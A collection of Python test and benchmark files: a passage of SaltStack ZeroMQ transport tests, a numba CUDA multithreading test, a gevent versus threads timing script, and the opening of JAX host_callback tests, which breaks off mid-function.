TODO: something besides echo
"""
return payload, {"fun": "send_clear"}
class ClearReqTestCases(BaseZMQReqCase, ReqChannelMixin):
"""
Test all of the clear msg stuff
"""
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(
self.minion_config, crypt="clear"
)
def tearDown(self):
self.channel.close()
del self.channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send_clear"}))
@slowTest
def test_master_uri_override(self):
"""
ensure master_uri kwarg is respected
"""
# minion_config should be 127.0.0.1, we want a different uri that still connects
uri = "tcp://{master_ip}:{master_port}".format(
master_ip="localhost", master_port=self.minion_config["master_port"]
)
channel = salt.transport.client.ReqChannel.factory(
self.minion_config, master_uri=uri
)
self.assertIn("localhost", channel.master_uri)
del channel
@flaky
@not_runs_on(
kernel="linux",
os_familiy="Suse",
reason="Skipping until https://github.com/saltstack/salt/issues/32902 gets fixed",
)
class AESReqTestCases(BaseZMQReqCase, ReqChannelMixin):
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_config)
def tearDown(self):
self.channel.close()
del self.channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send"}))
# TODO: make failed returns have a specific framing so we can raise the same exception
# on encrypted channels
#
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
#
# WARNING: This test will fail randomly on any system with > 1 CPU core!!!
#
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
@slowTest
def test_badload(self):
"""
Test a variety of bad requests, make sure that we get some sort of error
"""
# TODO: This test should be re-enabled when Jenkins moves to C7.
# Once the version of salt-testing is increased to something newer than the September
# release of salt-testing, the @flaky decorator should be applied to this test.
msgs = ["", [], tuple()]
for msg in msgs:
with self.assertRaises(salt.exceptions.AuthenticationError):
ret = self.channel.send(msg, timeout=5)
class BaseZMQPubCase(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
"""
Test the req server/client pair
"""
@classmethod
def setUpClass(cls):
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "zeromq",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
}
)
cls.minion_config = salt.config.minion_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "minion")
)
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "zeromq",
"master_ip": "127.0.0.1",
"master_port": ret_port,
"master_uri": "tcp://127.0.0.1:{}".format(ret_port),
}
)
cls.process_manager = salt.utils.process.ProcessManager(
name="ReqServer_ProcessManager"
)
cls.server_channel = salt.transport.server.PubServerChannel.factory(
cls.master_config
)
cls.server_channel.pre_fork(cls.process_manager)
# we also require req server for auth
cls.req_server_channel = salt.transport.server.ReqServerChannel.factory(
cls.master_config
)
cls.req_server_channel.pre_fork(cls.process_manager)
cls._server_io_loop = salt.ext.tornado.ioloop.IOLoop()
cls.evt = threading.Event()
cls.req_server_channel.post_fork(
cls._handle_payload, io_loop=cls._server_io_loop
)
cls.server_thread = threading.Thread(
target=run_loop_in_thread, args=(cls._server_io_loop, cls.evt)
)
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
cls.process_manager.kill_children()
cls.process_manager.stop_restarting()
time.sleep(
2
) # Give the procs a chance to fully close before we stop the io_loop
cls.evt.set()
cls.server_thread.join()
cls.req_server_channel.close()
cls.server_channel.close()
cls._server_io_loop.stop()
del cls.server_channel
del cls._server_io_loop
del cls.process_manager
del cls.server_thread
del cls.master_config
del cls.minion_config
@classmethod
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
return payload, {"fun": "send_clear"}
def setUp(self):
super().setUp()
self._start_handlers = dict(self.io_loop._handlers)
def tearDown(self):
super().tearDown()
failures = []
for k, v in self.io_loop._handlers.items():
if self._start_handlers.get(k) != v:
failures.append((k, v))
del self._start_handlers
if len(failures) > 0:
raise Exception("FDs still attached to the IOLoop: {}".format(failures))
@skipIf(True, "Skip until we can devote time to fix this test")
class AsyncPubChannelTest(BaseZMQPubCase, PubChannelMixin):
"""
Tests around the publish system
"""
def get_new_ioloop(self):
return salt.ext.tornado.ioloop.IOLoop()
class AsyncReqMessageClientPoolTest(TestCase):
def setUp(self):
super().setUp()
sock_pool_size = 5
with patch(
"salt.transport.zeromq.AsyncReqMessageClient.__init__",
MagicMock(return_value=None),
):
self.message_client_pool = AsyncReqMessageClientPool(
{"sock_pool_size": sock_pool_size}, args=({}, "")
)
self.original_message_clients = self.message_client_pool.message_clients
self.message_client_pool.message_clients = [
MagicMock() for _ in range(sock_pool_size)
]
def tearDown(self):
del self.original_message_clients
super().tearDown()
def test_send(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.send_queue = [0, 0, 0]
message_client_mock.send.return_value = []
self.assertEqual([], self.message_client_pool.send())
self.message_client_pool.message_clients[2].send_queue = [0]
self.message_client_pool.message_clients[2].send.return_value = [1]
self.assertEqual([1], self.message_client_pool.send())
class ZMQConfigTest(TestCase):
def test_master_uri(self):
"""
test _get_master_uri method
"""
m_ip = "127.0.0.1"
m_port = 4505
s_ip = "111.1.0.1"
s_port = 4058
m_ip6 = "1234:5678::9abc"
s_ip6 = "1234:5678::1:9abc"
with patch("salt.transport.zeromq.LIBZMQ_VERSION_INFO", (4, 1, 6)), patch(
"salt.transport.zeromq.ZMQ_VERSION_INFO", (16, 0, 1)
):
# pass in both source_ip and source_port
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip, master_port=m_port, source_ip=s_ip, source_port=s_port
) == "tcp://{}:{};{}:{}".format(s_ip, s_port, m_ip, m_port)
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip6, master_port=m_port, source_ip=s_ip6, source_port=s_port
) == "tcp://[{}]:{};[{}]:{}".format(s_ip6, s_port, m_ip6, m_port)
# source ip and source_port empty
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip, master_port=m_port
) == "tcp://{}:{}".format(m_ip, m_port)
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip6, master_port=m_port
) == "tcp://[{}]:{}".format(m_ip6, m_port)
# pass in only source_ip
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip, master_port=m_port, source_ip=s_ip
) == "tcp://{}:0;{}:{}".format(s_ip, m_ip, m_port)
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip6, master_port=m_port, source_ip=s_ip6
) == "tcp://[{}]:0;[{}]:{}".format(s_ip6, m_ip6, m_port)
# pass in only source_port
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip, master_port=m_port, source_port=s_port
) == "tcp://0.0.0.0:{};{}:{}".format(s_port, m_ip, m_port)
class PubServerChannel(TestCase, AdaptedConfigurationTestCaseMixin):
@classmethod
def setUpClass(cls):
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "zeromq",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
"sign_pub_messages": False,
}
)
salt.master.SMaster.secrets["aes"] = {
"secret": multiprocessing.Array(
ctypes.c_char,
salt.utils.stringutils.to_bytes(
salt.crypt.Crypticle.generate_key_string()
),
),
}
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "zeromq",
"master_ip": "127.0.0.1",
"master_port": ret_port,
"auth_timeout": 5,
"auth_tries": 1,
"master_uri": "tcp://127.0.0.1:{}".format(ret_port),
}
)
@classmethod
def tearDownClass(cls):
del cls.minion_config
del cls.master_config
def setUp(self):
# Start the event loop, even though we don't directly use this with
# ZeroMQPubServerChannel, having it running seems to increase the
# likely hood of dropped messages.
self.io_loop = salt.ext.tornado.ioloop.IOLoop()
self.io_loop.make_current()
self.io_loop_thread = threading.Thread(target=self.io_loop.start)
self.io_loop_thread.start()
self.process_manager = salt.utils.process.ProcessManager(
name="PubServer_ProcessManager"
)
def tearDown(self):
self.io_loop.add_callback(self.io_loop.stop)
self.io_loop_thread.join()
self.process_manager.stop_restarting()
self.process_manager.kill_children()
del self.io_loop
del self.io_loop_thread
del self.process_manager
@staticmethod
def _gather_results(opts, pub_uri, results, timeout=120, messages=None):
"""
Gather results until then number of seconds specified by timeout passes
without reveiving a message
"""
ctx = zmq.Context()
sock = ctx.socket(zmq.SUB)
sock.setsockopt(zmq.LINGER, -1)
sock.setsockopt(zmq.SUBSCRIBE, b"")
sock.connect(pub_uri)
last_msg = time.time()
serial = salt.payload.Serial(opts)
crypticle = salt.crypt.Crypticle(
opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
while time.time() - last_msg < timeout:
try:
payload = sock.recv(zmq.NOBLOCK)
except zmq.ZMQError:
time.sleep(0.01)
else:
if messages:
if messages != 1:
messages -= 1
continue
payload = crypticle.loads(serial.loads(payload)["load"])
if "stop" in payload:
break
last_msg = time.time()
results.append(payload["jid"])
@skipIf(salt.utils.platform.is_windows(), "Skip on Windows OS")
@slowTest
def test_publish_to_pubserv_ipc(self):
"""
Test sending 10K messags to ZeroMQPubServerChannel using IPC transport
ZMQ's ipc transport not supported on Windows
"""
opts = dict(self.master_config, ipc_mode="ipc", pub_hwm=0)
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
server_channel.pre_fork(
self.process_manager,
kwargs={"log_queue": salt.log.setup.get_multiprocessing_logging_queue()},
)
pub_uri = "tcp://{interface}:{publish_port}".format(**server_channel.opts)
send_num = 10000
expect = []
results = []
gather = threading.Thread(
target=self._gather_results, args=(self.minion_config, pub_uri, results,)
)
gather.start()
# Allow time for server channel to start, especially on windows
time.sleep(2)
for i in range(send_num):
expect.append(i)
load = {"tgt_type": "glob", "tgt": "*", "jid": i}
server_channel.publish(load)
server_channel.publish({"tgt_type": "glob", "tgt": "*", "stop": True})
gather.join()
server_channel.pub_close()
assert len(results) == send_num, (len(results), set(expect).difference(results))
@skipIf(salt.utils.platform.is_linux(), "Skip on Linux")
@slowTest
def test_zeromq_publish_port(self):
"""
test when connecting that we
use the publish_port set in opts
when its not 4506
"""
opts = dict(
self.master_config,
ipc_mode="ipc",
pub_hwm=0,
recon_randomize=False,
publish_port=455505,
recon_default=1,
recon_max=2,
master_ip="127.0.0.1",
acceptance_wait_time=5,
acceptance_wait_time_max=5,
)
opts["master_uri"] = "tcp://{interface}:{publish_port}".format(**opts)
channel = salt.transport.zeromq.AsyncZeroMQPubChannel(opts)
patch_socket = MagicMock(return_value=True)
patch_auth = MagicMock(return_value=True)
with patch.object(channel, "_socket", patch_socket), patch.object(
channel, "auth", patch_auth
):
channel.connect()
assert str(opts["publish_port"]) in patch_socket.mock_calls[0][1][0]
@skipIf(salt.utils.platform.is_linux(), "Skip on Linux")
def test_zeromq_zeromq_filtering_decode_message_no_match(self):
"""
test AsyncZeroMQPubChannel _decode_messages when
zmq_filtering enabled and minion does not match
"""
message = [
b"4f26aeafdb2367620a393c973eddbe8f8b846eb",
b"\x82\xa3enc\xa3aes\xa4load\xda\x00`\xeeR\xcf"
b"\x0eaI#V\x17if\xcf\xae\x05\xa7\xb3bN\xf7\xb2\xe2"
b'\xd0sF\xd1\xd4\xecB\xe8\xaf"/*ml\x80Q3\xdb\xaexg'
b"\x8e\x8a\x8c\xd3l\x03\\,J\xa7\x01i\xd1:]\xe3\x8d"
b"\xf4\x03\x88K\x84\n`\xe8\x9a\xad\xad\xc6\x8ea\x15>"
b"\x92m\x9e\xc7aM\x11?\x18;\xbd\x04c\x07\x85\x99\xa3\xea[\x00D",
]
opts = dict(
self.master_config,
ipc_mode="ipc",
pub_hwm=0,
zmq_filtering=True,
recon_randomize=False,
recon_default=1,
recon_max=2,
master_ip="127.0.0.1",
acceptance_wait_time=5,
acceptance_wait_time_max=5,
)
opts["master_uri"] = "tcp://{interface}:{publish_port}".format(**opts)
server_channel = salt.transport.zeromq.AsyncZeroMQPubChannel(opts)
with patch(
"salt.crypt.AsyncAuth.crypticle",
MagicMock(return_value={"tgt_type": "glob", "tgt": "*", "jid": 1}),
) as mock_test:
res = server_channel._decode_messages(message)
assert res.result() is None
@skipIf(salt.utils.platform.is_linux(), "Skip on Linux")
def test_zeromq_zeromq_filtering_decode_message(self):
"""
test AsyncZeroMQPubChannel _decode_messages
when zmq_filtered enabled
"""
message = [
b"4f26aeafdb2367620a393c973eddbe8f8b846ebd",
b"\x82\xa3enc\xa3aes\xa4load\xda\x00`\xeeR\xcf"
b"\x0eaI#V\x17if\xcf\xae\x05\xa7\xb3bN\xf7\xb2\xe2"
b'\xd0sF\xd1\xd4\xecB\xe8\xaf"/*ml\x80Q3\xdb\xaexg'
b"\x8e\x8a\x8c\xd3l\x03\\,J\xa7\x01i\xd1:]\xe3\x8d"
b"\xf4\x03\x88K\x84\n`\xe8\x9a\xad\xad\xc6\x8ea\x15>"
b"\x92m\x9e\xc7aM\x11?\x18;\xbd\x04c\x07\x85\x99\xa3\xea[\x00D",
]
opts = dict(
self.master_config,
ipc_mode="ipc",
pub_hwm=0,
zmq_filtering=True,
recon_randomize=False,
recon_default=1,
recon_max=2,
master_ip="127.0.0.1",
acceptance_wait_time=5,
acceptance_wait_time_max=5,
)
opts["master_uri"] = "tcp://{interface}:{publish_port}".format(**opts)
server_channel = salt.transport.zeromq.AsyncZeroMQPubChannel(opts)
with patch(
"salt.crypt.AsyncAuth.crypticle",
MagicMock(return_value={"tgt_type": "glob", "tgt": "*", "jid": 1}),
) as mock_test:
res = server_channel._decode_messages(message)
assert res.result()["enc"] == "aes"
@skipIf(salt.utils.platform.is_windows(), "Skip on Windows OS")
@slowTest
def test_zeromq_filtering(self):
"""
Test sending messags to publisher using UDP
with zeromq_filtering enabled
"""
opts = dict(
self.master_config,
ipc_mode="ipc",
pub_hwm=0,
zmq_filtering=True,
acceptance_wait_time=5,
)
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
server_channel.pre_fork(
self.process_manager,
kwargs={"log_queue": salt.log.setup.get_multiprocessing_logging_queue()},
)
pub_uri = "tcp://{interface}:{publish_port}".format(**server_channel.opts)
send_num = 1
expect = []
results = []
gather = threading.Thread(
target=self._gather_results,
args=(self.minion_config, pub_uri, results,),
kwargs={"messages": 2},
)
gather.start()
# Allow time for server channel to start, especially on windows
time.sleep(2)
expect.append(send_num)
load = {"tgt_type": "glob", "tgt": "*", "jid": send_num}
with patch(
"salt.utils.minions.CkMinions.check_minions",
MagicMock(
return_value={
"minions": ["minion"],
"missing": [],
"ssh_minions": False,
}
),
):
server_channel.publish(load)
server_channel.publish({"tgt_type": "glob", "tgt": "*", "stop": True})
gather.join()
server_channel.pub_close()
assert len(results) == send_num, (len(results), set(expect).difference(results))
@slowTest
def test_publish_to_pubserv_tcp(self):
"""
Test sending 10K messags to ZeroMQPubServerChannel using TCP transport
"""
opts = dict(self.master_config, ipc_mode="tcp", pub_hwm=0)
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
server_channel.pre_fork(
self.process_manager,
kwargs={"log_queue": salt.log.setup.get_multiprocessing_logging_queue()},
)
pub_uri = "tcp://{interface}:{publish_port}".format(**server_channel.opts)
send_num = 10000
expect = []
results = []
gather = threading.Thread(
target=self._gather_results, args=(self.minion_config, pub_uri, results,)
)
gather.start()
# Allow time for server channel to start, especially on windows
time.sleep(2)
for i in range(send_num):
expect.append(i)
load = {"tgt_type": "glob", "tgt": "*", "jid": i}
server_channel.publish(load)
gather.join()
server_channel.pub_close()
assert len(results) == send_num, (len(results), set(expect).difference(results))
@staticmethod
def _send_small(opts, sid, num=10):
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
for i in range(num):
load = {"tgt_type": "glob", "tgt": "*", "jid": "{}-{}".format(sid, i)}
server_channel.publish(load)
server_channel.pub_close()
@staticmethod
def _send_large(opts, sid, num=10, size=250000 * 3):
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
for i in range(num):
load = {
"tgt_type": "glob",
"tgt": "*",
"jid": "{}-{}".format(sid, i),
"xdata": "0" * size,
}
server_channel.publish(load)
server_channel.pub_close()
@skipIf(salt.utils.platform.is_freebsd(), "Skip on FreeBSD")
@slowTest
def test_issue_36469_tcp(self):
"""
Test sending both large and small messags to publisher using TCP
https://github.com/saltstack/salt/issues/36469
"""
opts = dict(self.master_config, ipc_mode="tcp", pub_hwm=0)
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
server_channel.pre_fork(
self.process_manager,
kwargs={"log_queue": salt.log.setup.get_multiprocessing_logging_queue()},
)
send_num = 10 * 4
expect = []
results = []
pub_uri = "tcp://{interface}:{publish_port}".format(**opts)
# Allow time for server channel to start, especially on windows
time.sleep(2)
gather = threading.Thread(
target=self._gather_results, args=(self.minion_config, pub_uri, results,)
)
gather.start()
with ThreadPoolExecutor(max_workers=4) as executor:
executor.submit(self._send_small, opts, 1)
executor.submit(self._send_small, opts, 2)
executor.submit(self._send_small, opts, 3)
executor.submit(self._send_large, opts, 4)
expect = ["{}-{}".format(a, b) for a in range(10) for b in (1, 2, 3, 4)]
time.sleep(0.1)
server_channel.publish({"tgt_type": "glob", "tgt": "*", "stop": True})
gather.join()
server_channel.pub_close()
assert len(results) == send_num, (len(results), set(expect).difference(results))
class AsyncZeroMQReqChannelTests(TestCase):
def test_force_close_all_instances(self):
zmq1 = MagicMock()
zmq2 = MagicMock()
zmq3 = MagicMock()
zmq_objects = {"zmq": {"1": zmq1, "2": zmq2}, "other_zmq": {"3": zmq3}}
with patch(
"salt.transport.zeromq.AsyncZeroMQReqChannel.instance_map", zmq_objects
):
salt.transport.zeromq.AsyncZeroMQReqChannel.force_close_all_instances()
self.assertEqual(zmq1.mock_calls, [call.close()])
self.assertEqual(zmq2.mock_calls, [call.close()])
self.assertEqual(zmq3.mock_calls, [call.close()])
# check if instance map changed
self.assertIs(
zmq_objects, salt.transport.zeromq.AsyncZeroMQReqChannel.instance_map
)
|
test_multithreads.py
|
import traceback
import threading
import multiprocessing
import numpy as np
from numba import cuda
from numba.cuda.testing import skip_on_cudasim, CUDATestCase
import unittest
try:
from concurrent.futures import ThreadPoolExecutor
except ImportError:
has_concurrent_futures = False
else:
has_concurrent_futures = True
has_mp_get_context = hasattr(multiprocessing, 'get_context')
def check_concurrent_compiling():
@cuda.jit
def foo(x):
x[0] += 1
def use_foo(x):
foo[1, 1](x)
return x
arrays = [np.arange(10) for i in range(10)]
expected = np.arange(10)
expected[0] += 1
with ThreadPoolExecutor(max_workers=4) as e:
for ary in e.map(use_foo, arrays):
np.testing.assert_equal(ary, expected)
def spawn_process_entry(q):
try:
check_concurrent_compiling()
except:
msg = traceback.format_exc()
q.put('\n'.join(['', '=' * 80, msg]))
else:
q.put(None)
@skip_on_cudasim('disabled for cudasim')
class TestMultiThreadCompiling(CUDATestCase):
@unittest.skipIf(not has_concurrent_futures, "no concurrent.futures")
def test_concurrent_compiling(self):
check_concurrent_compiling()
@unittest.skipIf(not has_mp_get_context, "no multiprocessing.get_context")
def test_spawn_concurrent_compilation(self):
# force CUDA context init
cuda.get_current_device()
# use "spawn" to avoid inheriting the CUDA context
ctx = multiprocessing.get_context('spawn')
q = ctx.Queue()
p = ctx.Process(target=spawn_process_entry, args=(q,))
p.start()
try:
err = q.get()
finally:
p.join()
if err is not None:
raise AssertionError(err)
self.assertEqual(p.exitcode, 0, 'test failed in child process')
def test_invalid_context_error_with_d2h(self):
def d2h(arr, out):
out[:] = arr.copy_to_host()
arr = np.arange(1, 4)
out = np.zeros_like(arr)
darr = cuda.to_device(arr)
th = threading.Thread(target=d2h, args=[darr, out])
th.start()
th.join()
np.testing.assert_equal(arr, out)
def test_invalid_context_error_with_d2d(self):
def d2d(dst, src):
dst.copy_to_device(src)
arr = np.arange(100)
common = cuda.to_device(arr)
darr = cuda.to_device(np.zeros(common.shape, dtype=common.dtype))
th = threading.Thread(target=d2d, args=[darr, common])
th.start()
th.join()
np.testing.assert_equal(darr.copy_to_host(), arr)
if __name__ == '__main__':
unittest.main()
|
get_url.py
|
import time
import gevent
import urllib2
import simplejson as json
import threading
import gevent.monkey
gevent.monkey.patch_socket()
THREAD_NUM = 150
COUNT = 100000
def fetch(pid):
start = time.time()
response = urllib2.urlopen('http://sdiehl.github.io/gevent-tutorial/')
result = response.read()
#json_result = json.loads(result)
#datetime = json_result['datetime']
print('Process %s: %s\n' % (pid, time.time()-start))
#return json_result['datetime']
def compute(count):
tmp = count
# start = time.time()
while count > 0:
count -= 1
# print('Process %s: %s\n' % (tmp, time.time()-start))
def synchronous():
for i in range(1, THREAD_NUM):
fetch(i)
def asynchronous():
threads = []
for i in range(1,THREAD_NUM):
threads.append(gevent.spawn(fetch, i))
gevent.joinall(threads)
def async_cpu():
threads = []
for i in range(1,THREAD_NUM):
threads.append(gevent.spawn(compute, COUNT))
gevent.joinall(threads)
class UrlThread(threading.Thread):
# IO threads
def __init__(self, index):
super(UrlThread, self).__init__()
self.index = index
def run(self):
fetch(self.index)
class CPUThread(threading.Thread):
# Cpu-bound threads
def __init__(self, count):
super(CPUThread, self).__init__()
self.count = count
def run(self):
while self.count > 0:
self.count -= 1
def async_thread(thread_class):
threads = []
for i in range(1, THREAD_NUM):
# t = threading.Thread(target=fetch, args=[i])
t = thread_class(COUNT)
t.start()
threads.append(t)
for t in threads:
t.join()
# print('Synchronous:')
# t0 = time.time()
# synchronous()
# print ('cost:%s' % (time.time() - t0))
# print('Asynchronous:')
# t1 = time.time()
# asynchronous()
# print ('cost:%s' % (time.time() - t1))
print('Asynchronous(Thread):')
t2 = time.time()
async_thread(CPUThread)
print ('cost:%s' % (time.time() - t2))
print('Asynchronous(cpu-bound, gevent):')
t3 = time.time()
async_cpu()
print ('cost:%s' % (time.time() - t3))
|
host_callback_test.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import itertools
import logging
import os
import re
import threading
import time
from typing import Callable, Optional, Sequence
from unittest import skip, SkipTest
from absl.testing import absltest
from absl.testing import parameterized
import jax
from jax import core
from jax.config import config
from jax import dtypes
from jax.experimental import host_callback as hcb
from jax.experimental import PartitionSpec as P
from jax.experimental import maps
from jax.experimental import pjit
from jax import lax
from jax import numpy as jnp
from jax._src import test_util as jtu
from jax import tree_util
from jax._src.lib import xla_bridge
import numpy as np
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class _TestingOutputStream(object):
"""Use as `output_stream` for tests."""
def __init__(self):
self._output = []
self._test_method_name = None
def write(self, what: str) -> None:
print(f"output_stream[{self._test_method_name}]: {what}", end="")
self._output.append(what)
@property
def output(self):
return "".join(self._output)
@property
def output_sorted_by_device(self):
# Assume that the output is a sequence of strings including metadata
# and data, with metadata containing `device: xxx`
by_device = [] # each element is a pair (device, str_list)
for s in self._output:
m = re.match(r".*device: (\S+)", s)
if m:
by_device.append((m.group(1), []))
assert by_device, f"output does not include 'device:': {self._output}"
by_device[-1][1].append(s)
sorted_by_device = sorted(by_device, key=lambda x: x[0])
return "\n".join(itertools.chain(*[s[1] for s in sorted_by_device]))
def __str__(self):
return "TestingOutputStream"
def reset(self):
self._output = []
testing_stream = _TestingOutputStream()
def fun1(a):
"""Function used for several `id_tap` tests."""
y = hcb.id_print(a * 2., what="a * 2", output_stream=testing_stream)
y = hcb.id_print(y * 3., what="y * 3", output_stream=testing_stream, result=y)
return y ** 2 # Some computation to make the gradient interesting
def fun1_equiv(a): # Numerical equivalent of fun1
return (a * 2.) ** 2
def maybe_print(do_print: bool, arg, what: str, tap_with_device: Optional[bool] = False):
"""Conditionally print on testing_string"""
if do_print:
return hcb.id_print(arg, what=what,
output_stream=testing_stream, tap_with_device=tap_with_device)
else:
return arg
def local_devices():
# Tests require using not more than 2 devices.
return jax.local_devices()[:2]
ignore_jit_of_pmap_warning = partial(
jtu.ignore_warning, message=".*jit-of-pmap.*")
def assertMultiLineStrippedEqual(tst: jtu.JaxTestCase,
expected: str, what: str):
"""A variant that preprocesses the string to eliminate non-determinism in
floating point values, and several uninteresting id_tap primitive params.
"""
# Sometimes we get floating points in the output; we round them
def repl_floats(match_group):
matched = match_group.group(0)
if matched == ".": return matched
x = np.around(float(matched), decimals=2)
return f"{x:.2f}"
what = re.sub(r"\-?\d*\.[\-\def]*", repl_floats, what)
what = re.sub(r"output_stream=[^\]\n,]*,?", "", what)
what = re.sub(r"threshold=[^\]\n,]*,?", "", what)
what = re.sub(r"bwd=[^\]\n]*", "", what)
what = re.sub(r"out_trees=[^\]\n]*", "", what)
what = re.sub(r"fwd_jaxpr_thunk=[^\]\n]*", "", what)
what = re.sub(r"jvp_jaxpr_thunk=[^\]\n]*", "", what)
# Empty lines
what = re.sub(r"^\s*\n", "", what, flags=re.MULTILINE)
def repl_func(match_group):
matched = match_group.group(3)
if "function _print_consumer" in matched:
return match_group.group(1) + "=_print"
else:
return match_group.group(1) + "=..."
what = re.sub(r"((tap_func_)|(callback))=([^\]\n,]*),?", repl_func, what)
tst.assertMultiLineStrippedEqual(expected, what)
def helper_set_hlo_dump():
flags_str = os.getenv("XLA_FLAGS", "")
import shutil
dump_dir = "/tmp/xla_dump"
os.environ["XLA_FLAGS"] = f"{flags_str} --xla_dump_to={dump_dir}"
if os.path.isdir(dump_dir):
logging.warning(f"Deleting old XLA dump directory {dump_dir}")
shutil.rmtree(dump_dir)
logging.warning(f"Setting XLA dump directory {dump_dir}")
# Clear any cached backends so new CPU backend will pick up the env var.
xla_bridge.get_backend.cache_clear()
def helper_print_optimized_hlo(fun, *args):
backend = xla_bridge.get_backend()
c = jax.xla_computation(fun)(*args)
print(re.sub(r", metadata.*", "",
backend.compile(c).hlo_modules()[0].to_string()))
def helper_log_ir(name,
f_jax,
*args,
num_partitions=None,
strip_metadata=False):
print(f"Jaxpr[{name}]: {jax.make_jaxpr(f_jax)(*args)}")
jax_comp = jax.xla_computation(f_jax)(*args)
print(f"HLO[{name}]: {jax_comp.as_hlo_text()}")
backend = xla_bridge.get_backend()
if num_partitions is not None:
num_replicas = 1
device_assignment = np.arange(num_partitions * num_replicas)
device_assignment = np.reshape(device_assignment, (-1, num_partitions))
use_spmd_partitioning = num_partitions > 1
compile_options = xla_bridge.get_compile_options(
num_replicas=num_replicas,
num_partitions=num_partitions,
device_assignment=device_assignment,
use_spmd_partitioning=use_spmd_partitioning,
)
else:
compile_options = None
jax_optimized_hlo = backend.compile(
jax_comp, compile_options).hlo_modules()[0].to_string()
if strip_metadata:
jax_optimized_hlo = re.sub(r", metadata.*", "", jax_optimized_hlo)
print(f"Optimized HLO[{name}] for "
f"platform {backend.platform}: {jax_optimized_hlo}")
prev_xla_flags = None
def setUpModule():
global prev_xla_flags
# This will control the CPU devices. On TPU we always have 2 devices
prev_xla_flags = jtu.set_host_platform_device_count(2)
# Reset to previous configuration in case other test modules will be run.
def tearDownModule():
prev_xla_flags()
def assertMultiDeviceOutputEqual(tst: jtu.JaxTestCase,
expected_2CPUs: str):
"""Check that the multi-device output is equal to the expected.
The tests run with 2 devices if available, otherwise 1 device.
We adjust the expected output here for 1 device.
Args:
expected_2CPUs: the expected output for 2 CPUs. If there is only
one device, this is trimmed to the first device. If the current
device_under_test is not a CPU, then we change the names
"""
expected = expected_2CPUs
if len(local_devices()) == 1:
start_device_1 = expected.find('device: cpu:1')
if start_device_1 >= 0:
expected = expected[0:start_device_1]
def replace_device_name(m) -> str:
return str(local_devices()[int(m.group(1))])
expected = re.sub(r'cpu:(\d+)', replace_device_name, expected)
what = testing_stream.output_sorted_by_device
return assertMultiLineStrippedEqual(tst, expected, what)
class HostCallbackTapTest(jtu.JaxTestCase):
def setUp(self):
super().setUp()
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
testing_stream.reset()
testing_stream._test_method_name = self._testMethodName
self.old_flags = os.getenv("XLA_FLAGS", "")
def tearDown(self) -> None:
if os.getenv("XLA_FLAGS") != self.old_flags:
os.environ["XLA_FLAGS"] = self.old_flags
xla_bridge.get_backend.cache_clear()
hcb.barrier_wait("HostCallbackTapTest.tearDown")
super().tearDown()
def test_tap_eval(self):
self.assertAllClose((5. * 2.) ** 2, fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: a * 2
10.00
what: y * 3
30.00""", testing_stream.output)
def test_tap_with_tuple_results(self):
def func2(x):
